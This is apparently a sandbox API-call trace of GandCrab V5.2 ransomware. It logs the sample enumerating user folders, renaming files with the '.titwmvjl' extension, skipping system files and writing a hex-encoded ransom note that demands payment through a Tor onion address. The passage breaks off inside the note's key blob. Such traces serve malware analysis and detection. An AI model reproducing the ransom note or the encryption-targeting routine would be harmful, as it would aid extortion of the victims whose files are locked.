lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.895] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 50 [0096.895] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\pictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.896] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.896] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.896] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\") returned 26 [0096.896] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Pictures\\*") returned="C:\\Users\\Default\\Pictures\\*" [0096.896] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503478 [0096.896] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.896] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.897] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.897] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.897] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.897] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.897] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.897] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Pictures\\d2ca4a09d2ca4deb61a.lock" [0096.897] lstrlenW (lpString=".titwmvjl") returned 9 [0096.897] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 50 [0096.897] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.897] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Pictures\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 59 [0096.897] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 50 [0096.897] lstrlenW (lpString=".lock") returned 5 [0096.897] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.898] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.898] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.898] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.898] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.898] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.898] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.898] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Pictures\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Pictures\\TITWMVJL-DECRYPT.txt" [0096.898] lstrlenW (lpString=".titwmvjl") returned 9 [0096.898] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\TITWMVJL-DECRYPT.txt") returned 46 [0096.898] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.898] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Pictures\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 55 [0096.898] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\TITWMVJL-DECRYPT.txt") returned 46 [0096.898] lstrlenW (lpString=".txt") returned 4 [0096.898] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.898] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.899] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.899] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.899] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\TITWMVJL-DECRYPT.txt") returned 46 [0096.899] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\TITWMVJL-DECRYPT.txt") returned 46 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.899] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.899] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.899] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.899] FindClose (in: hFindFile=0x503478 | out: hFindFile=0x503478) returned 1 [0096.900] CloseHandle (hObject=0x230) returned 1 [0096.900] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.900] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0096.900] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0096.900] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0096.900] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\" [0096.900] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.900] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.900] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.900] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.900] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.900] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.901] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.901] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.901] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.901] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.901] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.903] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\PrintHood\\\\TITWMVJL-DECRYPT.txt") returned 48 [0096.903] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\printhood\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.903] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x